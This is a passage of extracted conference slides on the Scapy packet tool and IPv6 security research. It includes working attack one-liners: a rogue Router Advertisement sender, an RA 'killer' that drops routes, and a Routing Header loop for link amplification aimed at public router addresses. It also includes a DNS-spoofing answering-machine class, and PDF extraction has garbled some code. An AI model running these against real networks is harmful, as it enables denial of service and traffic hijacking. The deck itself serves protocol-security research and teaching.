<IPv6 nh=TCP dst=2001:4f8:4:7:2e0:81ff:fe52:9a6b |<TCP dport=[21, 80] |>>
>>> send(a)
..
Sent 2 packets.
>>> a.dst="2001:6c8:6:4::7" # ftp.freebsd.org
>>> a[TCP].dport=21
>>> a
<IPv6 nh=TCP dst=2001:6c8:6:4::7 |<TCP dport=ftp |>>
>>> b=sr1(a, verbose=0)
>>> b.src
2001:6c8:6:4::7
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 65/100
![Page 130: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/130.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
A tour of IPv6 support
Conversations>>> a=sniff(filter="ip6")
>>> a
<Sniffed: UDP:0 TCP:219 ICMP:0 Other:3>
>>> a.conversations(getsrcdst=lambda x:(x[IPv6].src, x[IPv6].dst), \type="png", target="> /tmp/conversations.png")
2001:db8:67df:1::2
2001:db8:67df:1:20e:1fff:feda:4660
ff02::1:ff00:2
2001:db8:67df:1::1
P. Biondi / A. Ebalard Scapy and IPv6 networking 66/100
![Page 131: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/131.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
A tour of IPv6 supportIPv6 support : simplifying IPv6 packet crafting
Scapy6 spares you the need to care about :
L2 address resolution (ND support);
L2/L3 source/destination address selection;
Name to address translation (aka DNS resolution);
L4 checksum computation;
Default values filling (static/dynamic ones);
Hop Limit values in specific cases (ND);
Layer bindings (Next Header field filling);
. . .
⇒ You keep your mind focused on fields of interest !!
P. Biondi / A. Ebalard Scapy and IPv6 networking 67/100
![Page 132: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/132.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
A tour of IPv6 supportA simple example
The one line Router Advertisement daemon
>>> sendp(Ether()/IPv6()/ICMPv6ND_RA()/ \ICMPv6NDOptPrefixInfo(prefix="2001:db8:cafe:deca::", \
prefixlen=64)/ \ICMPv6NDOptSrcLLAddr(lladdr="00:b0:b0:67:89:AB"), \loop=1, inter=3)
What Scapy6 did for you today :
You provided the 3 most important values (prefix, prefixlength and router Link layer Address).
Scapy6 filled addresses, Hop Limit, Next Header, Flags,checksum, length fields in a consistent way.
P. Biondi / A. Ebalard Scapy and IPv6 networking 68/100
![Page 133: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/133.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Other simple examples
What’s your name ?
>>> someaddr=["2001:6c8:6:4::7", "2001:500::1035", "2001:1ba0:0:4::1",
"2001:2f0:104:1:2e0:18ff:fea8:16f5", "2001:e40:100:207::2",
"2001:7f8:2:1::18", "2001:4f8:0:2::e", "2001:4f8:0:2::d"]
>>> for addr in someaddr:
... a = sr1(IPv6(dst=addr)/ICMPv6NIQueryName(data=addr), verbose=0)
... print a.sprintf( "%-35s,src%: %data%")
...
2001:6c8:6:4::7 : [’ftp.beastie.tdk.net.’]
2001:500::1035 : [’pao1b.f.root-servers.org.’]
2001:1ba0:0:4::1 : [’rimfall.dialtelecom.sk.’]
2001:2f0:104:1:2e0:18ff:fea8:16f5 : [’updraft3.jp.freebsd.org.’]
2001:e40:100:207::2 : [’ring.sakura.ad.jp.’]
2001:7f8:2:1::18 : [’z2.internal.securanetworks.net.’]
2001:4f8:0:2::e : [’sf1.isc.org.’]
2001:4f8:0:2::d : [’webster.isc.org.’]
P. Biondi / A. Ebalard Scapy and IPv6 networking 69/100
![Page 134: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/134.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Other simple examples
It gets even more funny with multicast
>>> a=sr(IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1"))
...
fe80::20a:5eff:fe00:1349 : [’assam.ipv6.test.lab.’]
fe80::20a:4aff:fe3d:4c27 : [’lotus.ipv6.test.lab.’]
fe80::20a:6cff:fe27:1c49 : [’yunnan.ipv6.test.lab.’]
fe80::20a:5bff:fe20:1d5a : [’darjeeling.ipv6.test.lab.’]
The one line Router Advertisement daemon killer>>> send(IPv6(src=server)/ICMPv6ND_RA(routerlifetime=0), loop=1, inter=1)
P. Biondi / A. Ebalard Scapy and IPv6 networking 70/100
![Page 135: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/135.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Other simple examples
It gets even more funny with multicast
>>> a=sr(IPv6(dst="ff02::1")/ICMPv6NIQueryName(data="ff02::1"))
...
fe80::20a:5eff:fe00:1349 : [’assam.ipv6.test.lab.’]
fe80::20a:4aff:fe3d:4c27 : [’lotus.ipv6.test.lab.’]
fe80::20a:6cff:fe27:1c49 : [’yunnan.ipv6.test.lab.’]
fe80::20a:5bff:fe20:1d5a : [’darjeeling.ipv6.test.lab.’]
The one line Router Advertisement daemon killer>>> send(IPv6(src=server)/ICMPv6ND_RA(routerlifetime=0), loop=1, inter=1)
P. Biondi / A. Ebalard Scapy and IPv6 networking 70/100
![Page 136: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/136.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 71/100
![Page 137: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/137.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
ICMPv6 SupportICMPv6 was promoted (1/2)
ICMPv6 <TAB> <TAB>
ICMPv6EchoRequest ICMPv6ND INDAdv /* Inverse Neighbor Discovery */ICMPv6EchoReply ICMPv6ND INDSol
ICMPv6DestUnreach ICMPv6NDOptHAInfo /* Mobile IPv6 */ICMPv6ParamProblem ICMPv6NDOptMTU /* Link MTU in RA */ICMPv6TimeExceeded ICMPv6NDOptPrefixInfo /* Main RA content */ICMPv6PacketTooBig ICMPv6NDOptRedirectedHdr
ICMPv6NDOptSrcAddrListICMPv6ND RS ICMPv6NDOptSrcLLAddr /* L2 Addr in RS/NS */ICMPv6ND RA ICMPv6NDOptTgtAddrList /* L2 Addr in NS */ICMPv6ND NS ICMPv6NDOptDstLLAddrICMPv6ND NA ICMPv6NDOptAdvIntervalICMPv6ND Redirect ICMPv6NDOptUnknown /* Generic fallback */
P. Biondi / A. Ebalard Scapy and IPv6 networking 72/100
![Page 138: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/138.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
IPv6Scapy6 capabilitiesICMPv6 Support
ICMPv6 SupportICMPv6 was promoted (2/2)
ICMPv6 <TAB> <TAB>
ICMPv6HAADReply /* Mobile IPv6 */ ICMPv6NIQueryICMPv6HAADRequest ICMPv6NIQueryIPv4ICMPv6MPAdv ICMPv6NIQueryIPv6ICMPv6MPSol ICMPv6NIQueryLocal
ICMPv6NIQueryNameICMPv6MLDone /* Multicast Listener Discovery */ ICMPv6NIReplyICMPv6MLQuery ICMPv6NIReplyRefuseICMPv6MLReport ICMPv6NIReplySuccess
ICMPv6NIReplySuccessIPv4ICMPv6MRD Advertisement ICMPv6NIReplySuccessIPv6ICMPv6MRD Solicitation ICMPv6NIReplySuccessNameICMPv6MRD Termination ICMPv6NIReplyUnknown
P. Biondi / A. Ebalard Scapy and IPv6 networking 73/100
![Page 139: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/139.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 74/100
![Page 140: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/140.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Basic Routing Header example
What’s inside
1 c l a s s IPv6OptionHeaderRouting ( IPv6OptionHeader ) :2 name = "IPv6 Option Header Routing"
3 f i e l d s d e s c = [ ByteEnumField ( "nh" , 59 , ipv6nh ) ,4 ByteF i e l d ( "len" , None ) ,5 ByteF i e l d ( "type" , 0 ) ,6 ByteF i e l d ( "segleft" , None ) ,7 B i t F i e l d ( "reserved" , 0 , 32) ,8 IP6Rout ingHeade rL i s tF i e l d ( "addresses" , [ ] ) ]9 o v e r l o a d f i e l d s = { IPv6 : { "nh" : 43 }}
sr1() Example
>>> a = sr1(IPv6(dst="2001:4f8:4:7:2e0:81ff:fe52:9a6b")/ \IPv6OptionHeaderRouting(addresses=["2001:78:1:32::1", "2001:20:82:203:fea5:385"])/ \ICMPv6EchoRequest(data=RandString(7)), verbose=0)
>>> a.src
"2001:20:82:203:fea5:385"
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 75/100
![Page 141: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/141.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Remote and boomerang traceroute
>>> waypoint = "2001:301:0:8002:203:47ff:fea5:3085"
>>> target = "2001:5f9:4:7:2e0:81ff:fe52:9a6b"
>>> traceroute6(waypoint, minttl=15 , maxttl=34, \l4=IPv6OptionHeaderRouting(addresses=[target])/ \ICMPv6EchoRequest(data=RandString(7)))
2001:301:0:8002:203:47ff:fea5:3085 :IER
15 2001:319:2000:5000::92 3
16 2001:301:0:1c04:230:13ff:feae:5b 3
17 2001:301:0:4800::7800:1 3
18 2001:301:0:8002:203:47ff:fea5:3085 3
19 2001:301:0:2::6800:1 3
20 2001:301:0:1c04:20e:39ff:fee3:3400 3
21 2001:301:133::1dec:0 3
22 2001:301:901:7::18 3
23 2001:301:0:1800::2914:1 3
24 2001:319:2000:3002::21 3
25 2001:319:0:6000::19 3
26 2001:319:0:2000::cd 3
27 2001:519:0:2000::196 3
28 2001:519:0:5000::1e 3
29 2001:5f9:0:1::3:2 3
30 2001:5f9:0:1::5:2 3
31 2001:5f9:0:1::f:1 3
32 2001:5f9:0:1::14:2 3
33 2001:5f9:4:7:2e0:81ff:fe52:9a6b 129
34 2001:5f9:4:7:2e0:81ff:fe52:9a6b 129
(<Traceroute: ICMP:0 UDP:0 TCP:0 Other:20>,
<Unanswered: ICMP:0 UDP:0 TCP:0 Other:0>)
T a r g e t
S o u r c e I P v 6 r o u t e rN a t u r a l p a t hF o r c e d p a t h ( u s i n g R H 0 )W a y p o i n t
P. Biondi / A. Ebalard Scapy and IPv6 networking 76/100
![Page 142: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/142.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Funny gameRules of the game
Goal
Keep an IPv6 packet as long as possible in IPv6 Internet routinginfrastructure.
Rules
No L4 help : only IPv6 L3 infrastructure hijacking
No cheating : explicit tunnels are banned (2002::/16, . . . )
No abuse : it’s only a game !!
Clue
It’s based on Routing Header mechanism . . .
P. Biondi / A. Ebalard Scapy and IPv6 networking 77/100
![Page 143: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/143.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Funny gameSolution
Current high score>>> addr1 = ’2001:4830:ff:12ea::2’
>>> addr2 = ’2001:360:1:10::2’
>>> zz=time.time(); \a=sr1(IPv6(dst=addr2, hlim=255)/ \IPv6OptionHeaderRouting(addresses=[addr1, addr2]*43)/ \ICMPv6EchoRequest(data="staythere"), verbose=0, timeout=80); \print "%.2f seconds" % (time.time() - zz)
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 78/100
![Page 144: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/144.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Funny gameSolution
Current high score>>> addr1 = ’2001:4830:ff:12ea::2’
>>> addr2 = ’2001:360:1:10::2’
>>> zz=time.time(); \a=sr1(IPv6(dst=addr2, hlim=255)/ \IPv6OptionHeaderRouting(addresses=[addr1, addr2]*43)/ \ICMPv6EchoRequest(data="staythere"), verbose=0, timeout=80); \print "%.2f seconds" % (time.time() - zz)
32.29 seconds
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 78/100
![Page 145: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/145.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Funny gameSolution
Current high score>>> addr1 = ’2001:4830:ff:12ea::2’
>>> addr2 = ’2001:360:1:10::2’
>>> zz=time.time(); \a=sr1(IPv6(dst=addr2, hlim=255)/ \IPv6OptionHeaderRouting(addresses=[addr1, addr2]*43)/ \ICMPv6EchoRequest(data="staythere"), verbose=0, timeout=80); \print "%.2f seconds" % (time.time() - zz)
32.29 seconds
>>>
Link saturation / Amplification effect
100 KBytes/s upload bandwidth,
32 seconds storage between the 2 routers
=⇒ 1.6 MBytes/sec of traffic in both directions on the link
P. Biondi / A. Ebalard Scapy and IPv6 networking 78/100
![Page 146: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/146.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 79/100
![Page 147: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/147.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Playing with Routing HeadersQuick OS support summary
Routing Header processing
OS Host Router Firewallable Deactivable
Linux 2.6 dropped routed not reliably no
FreeBSD 6.1 routed routed not reliably noMac OS X routed routed no no
OpenBSD 3.8 routed routed no no
XP SP2 dropped - - -Vista dropped - - -
Cisco IOS - routed not reliably yesJuniper - routed no no
P. Biondi / A. Ebalard Scapy and IPv6 networking 80/100
![Page 148: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/148.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
In the pipeIKEv2 and Teredo
Teredo
External extension for Scapy6
Most of the work already done (70%)
Waiting for 2001::/32 prefix to be propagated
Expected with/before Windows R© VistaTM
release
IKEv2
Challenging extension on many aspects
A playground for state and crypto support in Scapy
Expected before a stable Racoon2 release ;-)
P. Biondi / A. Ebalard Scapy and IPv6 networking 81/100
![Page 149: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/149.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
3D visualization/interactionsA picture is worth a thousand words
P. Biondi / A. Ebalard Scapy and IPv6 networking 82/100
![Page 150: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/150.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Conclusion
IPv6 is coming, with a lot of things to look at.
It’s both . . .
. . . simple (design)
. . . complicated (extensions, transition mechanisms)
It’s like no one learned from IPv4 problems. Implementors aredoing the same mistakes again (source routing)
We need tools to tests stacks and products
Turning ideas into PoC is a question of seconds with Scapy6
P. Biondi / A. Ebalard Scapy and IPv6 networking 83/100
![Page 151: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/151.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
The End
That’s all folks! Thanks for your attention.
You can reach us at:
{
Useful links:
Scapy: http://www.secdev.org/projects/scapy
Scapy6: http://namabiiru.hongo.wide.ad.jp/scapy6
UTscapy: http://www.secdev.org/projects/UTscapy
These slides: http://www.secdev.org/
P. Biondi / A. Ebalard Scapy and IPv6 networking 84/100
![Page 152: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/152.jpg)
ReferencesAdditionnal material
zoomed frames
Appendices
6 References
7 Additionnal materialLearning Python in 2 slidesAnswering machines
8 zoomed frames
P. Biondi / A. Ebalard Scapy and IPv6 networking 85/100
![Page 153: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/153.jpg)
ReferencesAdditionnal material
zoomed frames
References I
P. Biondi, Scapyhttp://www.secdev.org/projects/scapy/
Ed3f, 2002, Firewall spotting with broken CRC, Phrack 60http://www.phrack.org/phrack/60/p60-0x0c.txt
Ofir Arkin and Josh Anderson, Etherleak: Ethernet framepadding information leakage,http://www.atstake.com/research/advisories/2003/atstake etherleak report.pdf
P. Biondi, 2002 Linux Netfilter NAT/ICMP code informationleakhttp://www.netfilter.org/security/2002-04-02-icmp-dnat.html
P. Biondi / A. Ebalard Scapy and IPv6 networking 86/100
![Page 154: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/154.jpg)
ReferencesAdditionnal material
zoomed frames
References II
P. Biondi, 2003 Linux 2.0 remote info leak from too big icmpcitationhttp://www.secdev.org/adv/CARTSA-20030314-icmpleak
P. Biondi / A. Ebalard Scapy and IPv6 networking 87/100
![Page 155: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/155.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Outline
6 References
7 Additionnal materialLearning Python in 2 slidesAnswering machines
8 zoomed frames
P. Biondi / A. Ebalard Scapy and IPv6 networking 88/100
![Page 156: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/156.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Learning Python in 2 slides (1/2)
This is an int (signed, 32bits) : 42
This is a long (signed, infinite): 42L
This is a str : "bell\x07\n" or ’bell\x07\n’ (" ⇐⇒ ’)
This is a tuple (immutable): (1,4, "42")
This is a list (mutable): [4,2, "1"]
This is a dict (mutable): { "one":1 , "two":2 }
P. Biondi / A. Ebalard Scapy and IPv6 networking 89/100
![Page 157: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/157.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Learning Python in 2 slides (2/2)
No block delimiters. Indentation does matter.
if cond1:
instr
instr
elif cond2:
instr
else:
instr
while cond:
instr
instr
try:
instr
except exception:
instr
else:
instr
def fact(x):
if x == 0:
return 1
else:
return x*fact(x-1)
for var in set:
instr
lambda x,y: x+y
P. Biondi / A. Ebalard Scapy and IPv6 networking 90/100
![Page 158: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/158.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Outline
6 References
7 Additionnal materialLearning Python in 2 slidesAnswering machines
8 zoomed frames
P. Biondi / A. Ebalard Scapy and IPv6 networking 91/100
![Page 159: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/159.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Answering machines
An answering machine enables you to quickly design astimulus/response daemon
Already implemented: fake DNS server, ARP spoofer, DHCPdaemon, FakeARPd, Airpwn clone
Interface description
1 c l a s s Demo am( AnsweringMachine ) :2 funct ion name = "demo"
3 f i l t e r = "a bpf filter if needed"
4 def p a r s e op t i o n s ( s e l f , . . . ) :5 . . . .6 def i s r e q u e s t ( s e l f , req ) :7 # return 1 if req is a request
8 def make rep ly ( s e l f , req ) :9 # return the reply for req
P. Biondi / A. Ebalard Scapy and IPv6 networking 92/100
![Page 160: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/160.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Answering machinesUsing answering machines
The class must be instanciated
The parameters given to the constructor become defaultparameters
The instance is a callable object whose default parameters canbe overloaded
Once called, the instance loops, sniffs and answers stimuli
Side note:
Answering machine classes declaration automatically creates afunction, whose name is taken in the function name classattribute, that instantiates and runs the answering machine.This is done thanks to the ReferenceAM metaclass.
P. Biondi / A. Ebalard Scapy and IPv6 networking 93/100
![Page 161: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/161.jpg)
ReferencesAdditionnal material
zoomed frames
Learning Python in 2 slidesAnswering machines
Answering machinesDNS spoofing example
1 c l a s s DNS am( AnsweringMachine ) :2 funct ion name="dns_spoof"
3 f i l t e r = "udp port 53"
45 def p a r s e op t i o n s ( s e l f , j o k e r="192.168.1.1" , zone=None ) :6 i f zone i s None :7 zone = {}8 s e l f . zone = zone
9 s e l f . j o k e r=j o k e r
1011 def i s r e q u e s t ( s e l f , req ) :12 r e t u r n req . ha s l a y e r (DNS) and req . g e t l a y e r (DNS) . qr == 01314 def make rep ly ( s e l f , req ) :15 i p = req . g e t l a y e r ( IP )16 dns = req . g e t l a y e r (DNS)17 r e sp = IP ( dst=i p . s rc , s r c=i p . dst )/UDP( dport=i p . sport , spo r t=18 rdata = s e l f . zone . get ( dns . qd . qname , s e l f . j o k e r )19 r e sp /= DNS( i d=dns . id , qr=1, qd=dns . qd ,20 an=DNSRR( rrname=dns . qd . qname , t t l =10, rdata=rd
21 r e t u r n re spP. Biondi / A. Ebalard Scapy and IPv6 networking 94/100
![Page 162: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/162.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.apple.com
0
10000
20000
30000
40000
50000
60000
70000
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 95/100
![Page 163: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/163.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.cisco.com
0
2
4
6
8
10
12
14
16
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 96/100
![Page 164: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/164.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.google.com
0
10000
20000
30000
40000
50000
60000
70000
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 97/100
![Page 165: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/165.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.microsoft.com
28200
28400
28600
28800
29000
29200
29400
29600
29800
30000
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 98/100
![Page 166: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/166.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.yahoo.fr
0
10000
20000
30000
40000
50000
60000
0 100 200 300 400 500 600 700 800 900 1000
P. Biondi / A. Ebalard Scapy and IPv6 networking 99/100
![Page 167: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/167.jpg)
ReferencesAdditionnal material
zoomed frames
NAT enumeration: www.kernel.org
-1
-0.5
0
0.5
1
0 100 200 300 400 500 600 700 800
P. Biondi / A. Ebalard Scapy and IPv6 networking 100/100